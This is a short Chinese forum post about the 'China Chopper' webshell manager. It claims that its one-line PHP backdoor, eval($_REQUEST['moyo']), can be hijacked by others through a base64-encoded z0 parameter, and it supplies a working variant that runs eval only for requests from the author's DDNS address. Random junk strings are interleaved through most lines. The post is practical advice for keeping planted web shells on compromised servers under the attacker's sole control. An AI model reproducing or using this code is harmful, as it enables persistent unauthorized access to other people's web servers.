今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞* Q9 G6 F9 ^8 U4 y+ S
& J& |9 k4 p# l6 y6 p: _就算你设置了密码,使用了eval($_REQUEST['moyo']);
2 {% [; O, h, c" Y3 e% A/ l! A- h) o# M& u; _- X& }: ?4 G
但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门
0 @$ h1 _/ e' V) S- s2 Z0 b4 ?5 P6 x& x" M- v+ m* v) c& G$ N3 c
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));5 d6 x% |& X1 G- E1 A9 T/ N: V
& ~+ s: r u* J* ]) W直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了' I7 O) e$ P" O5 s$ \9 g o9 Y
' F$ f. Q6 s# U! }
不知道是设计缺陷还是故意留的后门4 W6 p' C+ T& H& k6 G* m
6 j, }; x8 A* [4 T% [
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用; \: o. i6 T+ M) L @
/ n, L3 t! j4 k" W# b
本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org
* T9 c; h7 l: _' S; g
m0 K' [- E( K% y! C) h然后一句话后门这样写
% C4 d5 s& g* t) i: c# j8 I+ N; q: E8 L! d
<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
( H3 j8 W0 B/ R( k8 G: J; E这样就可以让一句话后门只允许自己的电脑连接了
# u; O: |3 t$ s" J: G, h
, F0 z" M0 o5 y" E ] |